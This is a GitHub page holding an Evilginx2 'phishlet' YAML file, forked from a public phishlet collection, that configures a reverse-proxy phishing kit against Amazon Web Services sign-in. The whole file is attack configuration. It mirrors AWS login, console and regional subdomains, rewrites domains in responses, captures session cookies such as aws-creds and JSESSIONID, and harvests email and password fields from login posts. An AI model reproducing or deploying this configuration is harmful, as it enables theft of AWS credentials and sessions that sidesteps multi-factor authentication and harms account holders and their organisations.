forked from An0nUD4Y/Evilginx2-Phishlets
-
Notifications
You must be signed in to change notification settings - Fork 0
/
aws.yaml
87 lines (71 loc) · 7.13 KB
/
aws.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
author: '@An0nud4y'
min_ver: '2.3.0'
proxy_hosts:
- {phish_sub: 'signin.aws', orig_sub: 'signin.aws', domain: 'amazon.com', session: true, is_landing: true, auto_filter: true}
- {phish_sub: 'aws', orig_sub: 'aws', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true}
- {phish_sub: '', orig_sub: '', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true}
- {phish_sub: 'phd.aws', orig_sub: 'phd.aws', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true}
- {phish_sub: 'console.aws', orig_sub: 'console.aws', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true}
- {phish_sub: 'portal.aws', orig_sub: 'portal.aws', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true}
- {phish_sub: 'aws-signin-website-assets.s3', orig_sub: 'aws-signin-website-assets.s3', domain: 'amazonaws.com', session: true, is_landing: false, auto_filter: true}
- {phish_sub: 'cdn.assets.as2', orig_sub: 'cdn.assets.as2', domain: 'amazonaws.com', session: true, is_landing: false, auto_filter: true}
- {phish_sub: 'opfcaptcha-prod.s3', orig_sub: 'opfcaptcha-prod.s3', domain: 'amazonaws.com', session: true, is_landing: false, auto_filter: true}
- {phish_sub: 'a.b.cdn.console', orig_sub: 'a.b.cdn.console', domain: 'awsstatic.com', session: true, is_landing: false, auto_filter: true}
- {phish_sub: 'd1', orig_sub: 'd1', domain: 'awsstatic.com', session: true, is_landing: false, auto_filter: true}
- {phish_sub: 'd2eezf66cfmyv', orig_sub: 'd2eezf66cfmyv', domain: 'cloudfront.net', session: true, is_landing: false, auto_filter: true}
## SUBDOMAINS BASED ON GEO LOCATION.
- {phish_sub: 'us-east-1.console.aws', orig_sub: 'us-east-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'us-east-2.console.aws', orig_sub: 'us-east-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'us-west-1.console.aws', orig_sub: 'us-west-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'us-west-2.console.aws', orig_sub: 'us-west-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'af-south-1.console.aws', orig_sub: 'af-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'ap-east-1.console.aws', orig_sub: 'ap-east-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'ap-south-1.console.aws', orig_sub: 'ap-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'ap-northeast-3.console.aws', orig_sub: 'ap-northeast-3.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'ap-northeast-2.console.aws', orig_sub: 'ap-northeast-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'ap-southeast-1.console.aws', orig_sub: 'ap-southeast-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'ap-southeast-2.console.aws', orig_sub: 'ap-southeast-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'ap-northeast-1.console.aws', orig_sub: 'ap-northeast-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'ca-central-1.console.aws', orig_sub: 'ca-central-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'eu-central-1.console.aws', orig_sub: 'eu-central-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'eu-west-1.console.aws', orig_sub: 'eu-west-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'eu-west-2.console.aws', orig_sub: 'eu-west-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'eu-south-1.console.aws', orig_sub: 'eu-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'eu-west-3.console.aws', orig_sub: 'eu-west-3.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'eu-north-1.console.aws', orig_sub: 'eu-north-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'me-south-1.console.aws', orig_sub: 'me-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'sa-east-1.console.aws', orig_sub: 'sa-east-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
sub_filters:
- {triggers_on: 'signin.aws.amazon.com', orig_sub: '', domain: 'amazon.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'signin.aws.amazon.com', orig_sub: '', domain: 'amazonaws.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'signin.aws.amazon.com', orig_sub: '', domain: 'awsstatic.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'signin.aws.amazon.com', orig_sub: '', domain: 'cloudfront.net', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
auth_tokens:
- domain: '.amazon.com'
keys: ['aws-ubid-main', 'aws-userInfo-signed', '.*,regexp']
- domain: '.aws.amazon.com'
keys: ['awsm-vid,opt', 'awsccc', '.*,regexp']
- domain: '.console.aws.amazon.com'
keys: ['noflush_Region', 'noflush_awscnm', '.*,regexp']
- domain: '.signin.aws.amazon.com'
keys: ['aws-signin-csrf', 'aws-signin-account-info', 'aws-creds', '.*,regexp']
- domain: 'phd.aws.amazon.com'
keys: ['aws-creds-code-verifier', 'aws-consoleInfo', 'aws-creds', '.*,regexp']
- domain: 'portal.aws.amazon.com'
keys: ['aws-session-id-fallback,opt', 'aws-session-id', 'JSESSIONID', '.*,regexp']
- domain: 'signin.aws.amazon.com'
keys: ['JSESSIONID', '.*,regexp']
auth_urls:
- '/console/home'
credentials:
username:
key: 'email'
search: '(.*)'
type: 'post'
password:
key: 'password'
search: '(.*)'
type: 'post'
login:
domain: 'signin.aws.amazon.com'
path: '/signin?redirect_uri=https%3A%2F%2Fconsole.aws.amazon.com%2Fconsole%2Fhome%3Ffromtb%3Dtrue%26hashArgs%3D%2523%26isauthcode%3Dtrue%26state%3DhashArgsFromTB_us-east-1_7de15f551561e8cc&client_id=arn%3Aaws%3Asignin%3A%3A%3Aconsole%2Fcanvas&forceMobileApp=0&code_challenge=yjMoqMdgfMR1J8rPfy4CI_50b3PldrJjTsFRPOFWJ9A&code_challenge_method=SHA-256'